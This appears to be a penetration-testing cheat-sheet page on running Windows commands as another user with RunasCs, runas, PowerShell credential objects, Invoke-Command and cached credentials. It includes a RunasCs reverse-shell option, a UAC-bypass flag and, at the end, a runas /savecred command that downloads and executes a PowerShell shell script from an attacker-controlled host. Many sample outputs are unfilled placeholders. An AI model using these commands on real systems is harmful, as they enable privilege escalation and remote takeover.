TLDRBins TLDRBins / Runas

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

RunasCS

.\RunasCs.exe '<USER>' '<PASSWORD>' "<CMD>" -r <LOCAL_IP>:<LOCAL_PORT>

Sample Output:
TO-DO
.\RunasCs.exe '<USER>' '<PASSWORD>' "<CMD>" -l <LOGON_TYPE>

Sample Output:
TO-DO
# Or
.\RunasCs.exe '<USER>' '<PASSWORD>' --bypass-uac "<CMD>" -l <LOGON_TYPE>

Sample Output:
TO-DO

LOGON TYPE
---------------------
2  Interactive
3  Network
4  Batch
5  Service
7  Unlock
8  NetworkCleartext
9  NewCredentials
10 RemoteInteractive
11 CachedInteractive

Sample Output:
TO-DO

Ref: RunasCS

Runas (With Password)

runas /user:'<USER>' "<CMD>"

Sample Output:
runas /user:'admin' "powershell"

Runas (With Cred Object)

1. Create Credential Object

$username = '<DOMAIN>\<USER>'

Sample Output:
TO-DO
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force

Sample Output:
TO-DO
$cred = New-Object System.Management.Automation.PSCredential($username, $password)

Sample Output:
TO-DO
$username = '<DOMAIN>\<USER>'

Sample Output:
TO-DO
$password = '<PASSWORD>'

Sample Output:
TO-DO
$secstr = New-Object -TypeName System.Security.SecureString

Sample Output:
TO-DO
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}

Sample Output:
TO-DO
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr

Sample Output:
TO-DO

2. Run Command

# Set computer to 'localhost' if running locally
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME>

Sample Output:
Invoke-Command -ScriptBlock { powershell } -Credential $cred -Computer localhost

# If error, try
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME> -auth credssp

Sample Output:
TO-DO
# Invoke command with config
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME> -ConfigurationName <CONFIG_NAME>

Sample Output:
TO-DO
# Set computer to '.' if running locally
new-pssession -computername <COMPUTER_NAME> -credential $cred

Sample Output:
new-pssession -computername . -credential $cred

# Switch to new session
enter-pssession <SESSION_ID>

Sample Output:
TO-DO

Runas (With Cached Creds)

1. Check Cached Creds

cmdkey /list

Sample Output:
TO-DO

2. Run Command

runas /user:<DOMAIN>\<USER> /savecred "<CMD>"

Sample Output:
# e.g. Upload and run a shell
runas /user:<DOMAIN>\<USER> /savecred "powershell iex(new-object net.webclient).downloadstring('http://<LOCAL_IP>/shell.ps1')"